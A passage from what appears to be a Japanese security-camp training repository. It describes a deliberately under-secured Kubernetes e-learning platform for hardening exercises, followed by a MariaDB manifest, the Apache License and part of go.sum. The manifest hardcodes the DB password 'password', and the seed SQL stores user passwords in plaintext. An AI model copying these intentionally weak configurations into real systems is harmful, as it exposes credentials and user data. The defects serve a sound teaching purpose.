┌──────────────────────────────────────────────────────┐ 61 | │ 外部ユーザー │ 62 | │ (学生・社会人・法人管理者) │ 63 | └────────────────────┬─────────────────────────────────┘ 64 | │ HTTPS 65 | │ 66 | ┌────────────────────┴─────────────────────────────────┐ 67 | │ │ Kubernetes Cluster │ 68 | │ ┌─────────────────┴─────────────────────────────┐ │ 69 | │ │ Ingress Controller │ │ 70 | │ └─────────────────┬─────────────────────────────┘ │ 71 | │ │ HTTP │ 72 | │ ┌─────────────────┴─────────────────────────────┐ │ 73 | │ │ Frontend │ │ 74 | │ │ (React/TS) │ │ 75 | │ └─────────────────┬─────────────────────────────┘ │ 76 | │ │ HTTP API calls │ 77 | │ │ │ 78 | │ ┌───────────────────────────────────────────────┐ │ 79 | │ │ Backend API │ │ 80 | │ │ (Go/Gin) │ │ 81 | │ └─────────────────┬─────────────────────────────┘ │ 82 | │ │ MySQL queries │ 83 | │ │ │ 84 | │ ┌───────────────────────────────────────────────┐ │ 85 | │ │ Database │ │ 86 | │ │ (MariaDB) │ │ 87 | │ └───────────────────────────────────────────────┘ │ 88 | └──────────────────────────────────────────────────────┘ 89 | ``` 90 | 91 | ### 2.3 アプリケーション機能 92 | 93 | **無敗塾の主要機能**: 94 | - **学習管理システム**: コース管理、進捗追跡、成績評価 95 | - **ユーザー認証**: シンプルなユーザー名・パスワード認証 96 | - **REST API**: Goベースのバックエンドサービス 97 | - **データ管理**: ユーザー情報、学習データ、コース情報 98 | - **管理機能**: 教材アップロード、ユーザー管理、分析ダッシュボード(演習では未実装) 99 | 100 | ![](./images/muhai.png) 101 | 102 | ### 2.4 セキュリティ上の重要データ 103 | 104 | 以下は、無敗塾が扱う機密性の高いデータです。 105 | 106 | #### 個人情報 107 | - 学習者の氏名、ユーザー名、パスワード 108 | - 学習履歴、成績データ、進捗情報 109 | - メールアドレス、プロフィール情報 110 | 111 | #### 認証・認可情報 112 | - ユーザーパスワード、セッション管理情報 113 | - 管理者権限フラグ、アクセストークン 114 | 115 | #### ビジネス機密情報 116 | - 教材コンテンツ、問題・コース情報 117 | - 利用統計、学習データ分析結果 118 | 119 | #### 将来的に扱う予定の法人データ 120 | - 企業従業員の個人情報、研修履歴 121 | - 企業別の学習カリキュラム 122 | 123 | ### 2.5 技術スタック 124 | 125 | - **フロントエンド**: React (TypeScript) 126 | - **バックエンド**: Go (Gin framework) 127 | - **データベース**: MariaDB 128 | - **コンテナ**: Docker, Kubernetes 129 | - **CI/CD**: GitLab CI 130 | - **ログ監視**: Loki, Grafana 131 | 132 | ### 2.6 現在のセキュリティ成熟度 133 | 134 | **Level 1 (導入期)**: 急速な成長により、セキュリティ対策が追いついていない状況 135 | 136 | - ✅ HTTPSアクセス、基本的なIngress設定 137 | - ✅ 基本的なCI/CDパイプライン構築 138 | - ✅ Kubernetesの監査ログ収集 139 | - ❌ 脆弱性管理なし 140 | - ❌ 実行環境の監視未実施 141 | - etc... 142 | 143 | ## 3. インフラエンジニアとしての役割 144 | 145 | 皆さんは無敗塾のインフラエンジニアとして、前任者から引き継いだプラットフォームの管理およびセキュリティ強化を担当します。本講義ではプラットフォームセキュリティに焦点を当て、セキュリティ上の課題を検討・解決していきます。 146 | 147 | ### 3.1 引き継ぎ状況と前任者のメモ 148 | 149 | 前任のインフラエンジニアが残した引き継ぎドキュメントには、今後の課題が記載されています。 150 | 151 | **前任者からの引き継ぎメモ**: 152 | ``` 153 | 【現状の課題】 154 | 無敗塾のセキュリティ体制は最低限の設定しかされていない。 155 | 法人利用を想定したセキュリティ設定、運用体制が大幅に不足している状況。 156 | 157 | 【法人展開への技術的懸念】 158 | - 現在のセキュリティ設定ではサイバー攻撃に十分に対処できない 159 | - アクセス制御が不十分でデータ漏洩リスクが高い 160 | - 異常検知や攻撃監視の仕組みがなく、インシデント発見が困難 161 | 162 | 【経営陣からのプレッシャー】 163 | 「無敗ラーニング展開前に、まず無敗塾を確実に固めてほしい」 164 | 「セキュリティは重要だが、サービス停止や開発遅延は避けたい」 165 | 166 | 【その他コメント】 167 | 「法人顧客は『無敗塾で使っているのと同じ基盤』と聞いている。つまり無敗塾のセキュリティレベルが、そのまま法人展開の可否を決める。責任重大だが、具体的な指針は『業界標準に合わせて』としか言われていない...」 168 | ``` 169 | 170 | ## 4. 組織・チーム体制 171 | 172 | ITインフラ管理部門は小規模なチームで、急成長する事業を支えています。法人展開に向けたセキュリティ強化への期待が高まっていますが、具体的な指針は少なく、現場の判断に委ねられている状況です。 173 | 174 | ``` 175 | 無敗塾 組織図 176 | ├── 経営陣 ← 「法人展開前に無敗塾を確実に固めてほしい」 177 | ├── ITインフラ管理部門 178 | │ └── インフラエンジニア (3-4名) ← 皆さんの配属先 179 | ├── 開発部門 180 | │ ├── 無敗塾チーム (5名) ← 既存サービス 181 | │ └── 無敗ラーニング企画チーム (2名) ← 来年度展開予定 182 | └── 外部パートナー 183 | └── SaaS、クラウドベンダー 184 | ``` 185 | 186 | **現在のプレッシャー**: 187 | - **経営陣**: 「法人展開のチャンスを逃したくない。セキュリティ基盤をしっかり固めてほしい」 188 | - **開発チーム**: 「セキュリティは重要だが、機能開発のスピードも落としたくない」 189 | - **営業・CS**: 「法人顧客候補から技術的な安全性について質問が多い」 190 | 191 | **責任分界点**: 192 | - **インフラ管理部門**: プラットフォーム全体のセキュリティ、インフラ運用 193 | - **開発部門**: アプリケーションコード、ビジネスロジック 194 | - **外部パートナー**: SaaSやクラウドインフラの基盤部分 195 | 196 | **セキュリティ体制の現状**: 197 | - **セキュリティ専門人材**: インフラエンジニア(兼セキュリティ担当者)以外にセキュリティを専門に取り扱う人材はいない 198 | - **開発チームのセキュリティ意識**: アプリ開発者はこれまでセキュリティについては特に意識しておらず、機能実装を優先してきた 199 | - **セキュリティ責任の所在**: 200 | - アプリケーションの脆弱性修正は開発部門の担当 201 | - セキュリティを意識した実装の啓蒙や環境整備は、インフラエンジニアの役割 202 | - 組織全体のセキュリティ文化醸成もインフラ管理部門に期待されている 203 | 204 | **課題**:
205 | セキュリティ強化の方針や優先順位を、限られた情報とリソースの中でインフラチームが自ら決定しなければならない状況。法人展開というビジネスチャンスを成功させるため、「業界標準レベルのセキュリティ」という曖昧な指示のもと、具体的な対策を現場で判断する必要がある。 206 | 207 | ## 5. 演習環境の説明 208 | 209 | ### 5.1 提供される環境 210 | 演習では、事前に構築された以下の環境を使用します: 211 | 212 | - **Kubernetesクラスタ**: EC2上に構築されたkindクラスタ 213 | - **無敗塾アプリケーション**: クラスタ上で動作するWebアプリケーション 214 | - **Gitlab サーバー**: ソースコード、開発パイプラインの管理 215 | - **Harbor レジストリ**: コンテナイメージの管理 216 | - **監視スタック**: Loki, Grafana 217 | 218 | 環境構築手順 219 | 220 | ```bash 221 | cd /root/helm/ 222 | 223 | # 一括適用 224 | helmfile sync 225 | 226 | # 特定OSSのみ 227 | helmfile sync --selector app= 228 | ``` 229 | 230 | ### 5.2 アクセス情報 231 | 232 | ※ ローカル環境から8082→443のポートフォワード設定をしている想定です。 233 | 234 | ```bash 235 | # アプリケーションURL 236 | https://app.seccamp.com:8082 237 | ## ログイン情報 238 | username: sato 239 | password: pass1 240 | 241 | # ソースコードリポジトリ 242 | Gitlab: https://gitlab.seccamp.com:8082 243 | ## ログイン情報 244 | username: root 245 | password: 以下で取得 246 | kubectl view-secret -n gitlab gitlab-initial-root-password 247 | 248 | # コンテナレジストリ 249 | Harbor: https://harbor.seccamp.com:8082 250 | ## ログイン情報 251 | username: admin 252 | password: harboradminpassword 253 | 254 | # 監視ダッシュボード 255 | Grafana: https://grafana.seccamp.com:8082 256 | ## ログイン情報 257 | k view-secret -n monitoring grafana 258 | 259 | # その他 260 | ArgoCD: https://argocd.seccamp.com:8082 261 | Hubble: https://hubble.seccamp.com:8082 262 | ``` 263 | 264 | ### 5.3 前任者からの引き継ぎドキュメント 265 | 266 | 演習環境には前任者が残した以下の情報が含まれています。 267 | 268 | ```bash 269 | # 基本的な環境確認コマンド 270 | kubectl get nodes 271 | kubectl get namespaces 272 | kubectl get pods -A 273 | 274 | # 現在稼働中のアプリケーション確認 275 | kubectl get deployments -n seccamp-app 276 | kubectl get services -n seccamp-app 277 | kubectl get configmaps,secrets -n seccamp-app 278 | 279 | # 監視システムの状態 280 | kubectl get pods -n monitoring 281 | ``` 282 | 283 | **前任者のメモ(引き継ぎドキュメントより)**: 284 | ``` 285 | TODO: セキュリティ設定の見直し(法人展開準備) 286 | - 基本的なセキュリティ設定が不十分 287 | - コンテナ・Pod レベルでの適切な制御が未実装 288 | - ネットワークアクセス制御が甘い 289 | - 機密情報の管理方法に問題 290 | - 権限管理・アクセス制御の見直しが必要 291 | - 監査ログや証跡が不十分 292 | - セキュリティ監視体制が未整備 293 | 294 | 緊急度:高 295 | 法人展開のチャンスを逃さないため、法人監査に通るレベルのセキュリティ対策が必要。 296 | ただし開発チームからは「デプロイが複雑になるのは困る」と言われている。 297 | 298 | 会社からは「法人顧客の要求レベルに合わせて」と言われているが、具体的にどこまでやればいいのか不明。業界標準という曖昧な指示のみ。何かあったらインフラチームの責任になる状況で、判断に迷う。 299 | ``` 300 | 301 | ### 5.4 トラブルシューティング 302 | 303 | ```bash 304 | # Pod状態の確認 305 | kubectl get pods -n seccamp-app -o wide 306 | kubectl describe pod -n seccamp-app 307 | kubectl logs -n seccamp-app 308 | 309 | # 現在のユーザー権限確認 310 | kubectl auth whoami 311 | kubectl auth can-i get pods --namespace=seccamp-app 312 | 313 | # Service Account確認 314 | kubectl get serviceaccount -n seccamp-app 315 | kubectl describe serviceaccount default -n seccamp-app 316 | 317 | # ネットワークの確認 318 | curl -v https://app.seccamp.com 319 | nslookup app.seccamp.com 320 | 321 | kubectl get services,ingress -n seccamp-app 322 | kubectl get ingress -n seccamp-app app-frontend-ingress -o yaml 323 | kubectl logs -n ingress-nginx ingress-nginx-controller-b5d5b7c-2n4k4 324 | 325 | # リソース使用状況確認 326 | kubectl top nodes 327 | kubectl describe node | grep -A 5 "Allocated resources" 328 | ``` 329 | 330 | --- 331 | 332 | ## 次のステップ 333 | 334 | - [演習1 環境の把握](./training.md) 335 | - [2章 クラウドネイティブセキュリティの基礎](../02_cloud_native_sec/README.md) 336 | -------------------------------------------------------------------------------- /app/infra/manifests/db-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: db 5 | namespace: seccamp-app 6 | spec: 7 | replicas: 1 8 | selector: 9 | matchLabels: 10 | app: db 11 | template: 12 | metadata: 13 | labels: 14 | app: db 15 | spec: 16 | containers: 17 | - name: mariadb 18 | image: mariadb:11.3 19 | env: 20 | - name: MYSQL_ROOT_PASSWORD 21 | value: "password" 22 | - name: MYSQL_DATABASE 23 | value: "seccamp2025" 24 | - name: MYSQL_USER 25 | value: "rootuser" 26 | - name: MYSQL_PASSWORD 27 | value: "password" 28 | ports: 29 | - containerPort: 3306 30 | volumeMounts: 31 | - name: db-init 32 | mountPath: /docker-entrypoint-initdb.d 33 | volumes: 34 | - name: db-init 35 | configMap: 36 | name: db-init-sql 37 | --- 38 | apiVersion: v1 39 | kind: ConfigMap 40 | metadata: 41 | name: db-init-sql 42 | namespace: seccamp-app 43 | binaryData: 44 | init.sql: |- 45 | USE seccamp2025;

-- MariaDB initialization SQL (English only)
-- User information table
CREATE TABLE IF NOT EXISTS users (
    id INT AUTO_INCREMENT PRIMARY KEY,
    username VARCHAR(64) UNIQUE NOT NULL,
    full_name VARCHAR(128),
    password VARCHAR(256) NOT NULL,
    is_admin BOOLEAN DEFAULT FALSE
);

-- Learning content information table
CREATE TABLE IF NOT EXISTS courses (
    id INT AUTO_INCREMENT PRIMARY KEY,
    title VARCHAR(128) NOT NULL,
    description TEXT
);

-- Learning progress table (with composite unique constraint)
CREATE TABLE IF NOT EXISTS progress (
    id INT AUTO_INCREMENT PRIMARY KEY,
    user_id INT NOT NULL,
    course_id INT NOT NULL,
    percent INT DEFAULT 0,
    updated_at DATETIME,
    FOREIGN KEY (user_id) REFERENCES users(id),
    FOREIGN KEY (course_id) REFERENCES courses(id),
    UNIQUE KEY user_course_unique (user_id, course_id)
);

-- Sample data insertion SQL
-- User sample data (English names only)
INSERT INTO users (username, full_name, password, is_admin) VALUES
  ('sato', 'Taro Sato', 'pass1', FALSE),
  ('suzuki', 'Hanako Suzuki', 'pass2', FALSE),
  ('takahashi', 'Kenichi Takahashi', 'pass3', FALSE),
  ('tanaka', 'Yumi Tanaka', 'pass4', FALSE),
  ('watanabe', 'Shota Watanabe', 'pass5', FALSE),
  ('ito', 'Misaki Ito', 'pass6', FALSE),
  ('yamamoto', 'Yuto Yamamoto', 'pass7', FALSE),
  ('nakamura', 'Ayaka Nakamura', 'pass8', FALSE),
  ('kobayashi', 'Naoto Kobayashi', 'pass9', FALSE),
  ('kato', 'Emi Kato', 'pass10', FALSE),
  ('yoshida', 'Takumi Yoshida', 'pass11', FALSE),
  ('yamada', 'Saori Yamada', 'pass12', FALSE),
  ('sasaki', 'Ryosuke Sasaki', 'pass13', FALSE),
  ('yamaguchi', 'Mayumi Yamaguchi', 'pass14', FALSE),
  ('matsumoto', 'Tomoya Matsumoto', 'pass15', FALSE),
  ('inoue', 'Chihiro Inoue', 'pass16', FALSE),
  ('kimura', 'Daisuke Kimura', 'pass17', FALSE),
  ('hayashi', 'Miwa Hayashi', 'pass18', FALSE),
  ('shimizu', 'Kazuya Shimizu', 'pass19', FALSE),
  ('saito', 'Kaori Saito', 'pass20', FALSE),
  ('admin', 'Administrator', 'adminpass', TRUE);

-- Course sample data (English only - Basic to Advanced)
INSERT INTO courses (title, description) VALUES
  -- Basic/Introduction Courses (1-10)
  ('Python Introduction', 'Learn the basics of Python programming'),
  ('Kubernetes Fundamentals', 'Learn the fundamentals of Kubernetes'),
  ('Go Language Introduction', 'Learn the basics of Go programming language'),
  ('React Introduction', 'Learn the basics of React development'),
  ('Security Fundamentals', 'Learn the fundamentals of cybersecurity'),
  ('Linux Introduction', 'Learn the basics of Linux operating system'),
  ('Cloud Fundamentals', 'Learn the fundamentals of cloud technologies'),
  ('Network Fundamentals', 'Learn the basics of computer networking'),
  ('Docker Introduction', 'Learn the basics of Docker containerization'),
  ('CI/CD Introduction', 'Learn the basics of Continuous Integration and Deployment'),
  
  -- Intermediate Courses (11-20)
  ('Python Web Development', 'Build web applications using Django and Flask'),
  ('Kubernetes Operations', 'Advanced Kubernetes cluster management and operations'),
  ('Go Microservices', 'Build scalable microservices with Go'),
  ('React State Management', 'Advanced React patterns with Redux and Context API'),
  ('Penetration Testing', 'Learn ethical hacking and vulnerability assessment'),
  ('Linux System Administration', 'Advanced Linux server management and automation'),
  ('AWS Cloud Architecture', 'Design and implement AWS cloud solutions'),
  ('Network Security', 'Implement network security measures and protocols'),
  ('Docker Orchestration', 'Container orchestration with Docker Swarm'),
  ('DevOps Pipeline Design', 'Design and implement comprehensive DevOps pipelines'),
  
  -- Advanced Courses (21-30)
  ('Python Machine Learning', 'Advanced ML algorithms and data science with Python'),
  ('Kubernetes Security', 'Advanced security practices for Kubernetes clusters'),
  ('Go Performance Optimization', 'High-performance Go applications and profiling'),
  ('React Native Development', 'Cross-platform mobile development with React Native'),
  ('Advanced Threat Hunting', 'Advanced cybersecurity threat detection and analysis'),
  ('Linux Kernel Development', 'Understanding and modifying the Linux kernel'),
  ('Multi-Cloud Architecture', 'Design solutions across multiple cloud providers'),
  ('Network Protocol Analysis', 'Deep dive into network protocols and traffic analysis'),
  ('Kubernetes Custom Resources', 'Develop custom controllers and operators'),
  ('Infrastructure as Code', 'Advanced Terraform and infrastructure automation'),
  
  -- Expert/Specialized Courses (31-35)
  ('AI/ML System Design', 'Design and deploy production ML systems at scale'),
  ('Cloud Native Security', 'Comprehensive security for cloud-native applications'),
  ('Distributed Systems Architecture', 'Design highly scalable distributed systems'),
  ('Blockchain Development', 'Smart contract development and DeFi applications'),
  ('Quantum Computing Fundamentals', 'Introduction to quantum algorithms and computing');

-- Learning progress sample data (expanded with advanced courses)
INSERT INTO progress (user_id, course_id, percent, updated_at) VALUES
  -- Basic users starting with fundamentals
  (1, 1, 50, NOW()), (1, 2, 0, NOW()), (1, 3, 100, NOW()),
  (2, 1, 80, NOW()), (2, 2, 20, NOW()), (2, 3, 0, NOW()),
  (3, 1, 0, NOW()), (3, 2, 0, NOW()), (3, 3, 0, NOW()),
  
  -- Advanced users with multiple completed courses
  (4, 1, 100, NOW()), (4, 2, 100, NOW()), (4, 3, 100, NOW()),
  (4, 11, 75, NOW()), (4, 12, 50, NOW()), (4, 21, 25, NOW()),
  
  -- Intermediate users progressing through different paths
  (5, 1, 10, NOW()), (5, 2, 30, NOW()), (5, 3, 60, NOW()),
  (6, 5, 100, NOW()), (6, 15, 80, NOW()), (6, 25, 40, NOW()),
  (7, 6, 100, NOW()), (7, 16, 60, NOW()), (7, 26, 20, NOW()),
  (8, 7, 100, NOW()), (8, 17, 90, NOW()), (8, 27, 70, NOW()),
  
  -- DevOps focused learning path
  (9, 9, 100, NOW()), (9, 10, 100, NOW()), (9, 19, 85, NOW()),
  (9, 20, 65, NOW()), (9, 29, 45, NOW()), (9, 30, 25, NOW()),
  
  -- Security focused learning path
  (10, 5, 100, NOW()), (10, 15, 100, NOW()), (10, 25, 90, NOW()),
  (10, 18, 75, NOW()), (10, 32, 50, NOW()),
  
  -- Full-stack development path
  (11, 1, 100, NOW()), (11, 4, 100, NOW()), (11, 11, 80, NOW()),
  (11, 14, 60, NOW()), (11, 24, 40, NOW()),
  
  -- Cloud architecture specialists
  (12, 7, 100, NOW()), (12, 17, 100, NOW()), (12, 27, 85, NOW()),
  (12, 30, 70, NOW()), (12, 32, 30, NOW()),
  
  -- Machine Learning enthusiasts
  (13, 1, 100, NOW()), (13, 21, 90, NOW()), (13, 31, 60, NOW()),
  
  -- Emerging technology explorers
  (14, 34, 80, NOW()), (14, 35, 40, NOW()),
  
  -- Comprehensive learners
  (15, 1, 100, NOW()), (15, 5, 100, NOW()), (15, 7, 100, NOW()),
  (15, 11, 90, NOW()), (15, 15, 80, NOW()), (15, 17, 70, NOW()),
  (15, 21, 60, NOW()), (15, 25, 50, NOW()), (15, 27, 40, NOW());

 46 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /app/backend/go.sum: -------------------------------------------------------------------------------- 1 | filippo.io/edwards25519 v1.1.0 h1:FNf4tywRC1HmFuKW5xopWpigGjJKiJSV0Cqo0cJWDaA= 2 | filippo.io/edwards25519 v1.1.0/go.mod h1:BxyFTGdWcka3PhytdK4V28tE5sGfRvvvRV7EaN4VDT4= 3 | github.com/bytedance/sonic v1.5.0/go.mod h1:ED5hyg4y6t3/9Ku1R6dU/4KyJ48DZ4jPhfY1O2AihPM= 4 | github.com/bytedance/sonic v1.9.1 h1:6iJ6NqdoxCDr6mbY8h18oSO+cShGSMRGCEo7F2h0x8s= 5 | github.com/bytedance/sonic v1.9.1/go.mod h1:i736AoUSYt75HyZLoJW9ERYxcy6eaN6h4BZXU064P/U= 6 | github.com/bytedance/sonic v1.13.3 h1:MS8gmaH16Gtirygw7jV91pDCN33NyMrPbN7qiYhEsF0= 7 | github.com/bytedance/sonic v1.13.3/go.mod h1:o68xyaF9u2gvVBuGHPlUVCy+ZfmNNO5ETf1+KgkJhz4= 8 | github.com/bytedance/sonic/loader v0.1.1/go.mod h1:ncP89zfokxS5LZrJxl5z0UJcsk4M4yY2JpfqGeCtNLU= 9 | github.com/bytedance/sonic/loader v0.2.4 h1:ZWCw4stuXUsn1/+zQDqeE7JKP+QO47tz7QCNan80NzY= 10 | github.com/bytedance/sonic/loader v0.2.4/go.mod h1:N8A3vUdtUebEY2/VQC0MyhYeKUFosQU6FxH2JmUe6VI= 11 | github.com/chenzhuoyu/base64x v0.0.0-20211019084208-fb5309c8db06/go.mod h1:DH46F32mSOjUmXrMHnKwZdA8wcEefY7UVqBKYGjpdQY= 12 | github.com/chenzhuoyu/base64x v0.0.0-20221115062448-fe3a3abad311 h1:qSGYFH7+jGhDF8vLC+iwCD4WpbV1EBDSzWkJODFLams= 13 | github.com/chenzhuoyu/base64x v0.0.0-20221115062448-fe3a3abad311/go.mod h1:b583jCggY9gE99b6G5LEC39OIiVsWj+R97kbl5odCEk= 14 | github.com/cloudwego/base64x v0.1.5 h1:XPciSp1xaq2VCSt6lF0phncD4koWyULpl5bUxbfCyP4= 15 | github.com/cloudwego/base64x v0.1.5/go.mod h1:0zlkT4Wn5C6NdauXdJRhSKRlJvmclQ1hhJgA0rcu/8w= 16 | github.com/cloudwego/iasm v0.2.0/go.mod h1:8rXZaNYT2n95jn+zTI1sDr+IgcD2GVs0nlbbQPiEFhY= 17 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 18 | github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= 19 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 20 | github.com/gabriel-vasile/mimetype v1.4.2 h1:w5qFW6JKBz9Y393Y4q372O9A7cUSequkh1Q7OhCmWKU= 21 | github.com/gabriel-vasile/mimetype v1.4.2/go.mod h1:zApsH/mKG4w07erKIaJPFiX0Tsq9BFQgN3qGY5GnNgA= 22 | github.com/gabriel-vasile/mimetype v1.4.9 h1:5k+WDwEsD9eTLL8Tz3L0VnmVh9QxGjRmjBvAG7U/oYY= 23 | github.com/gabriel-vasile/mimetype v1.4.9/go.mod h1:WnSQhFKJuBlRyLiKohA/2DtIlPFAbguNaG7QCHcyGok= 24 | github.com/gin-contrib/cors v1.7.6 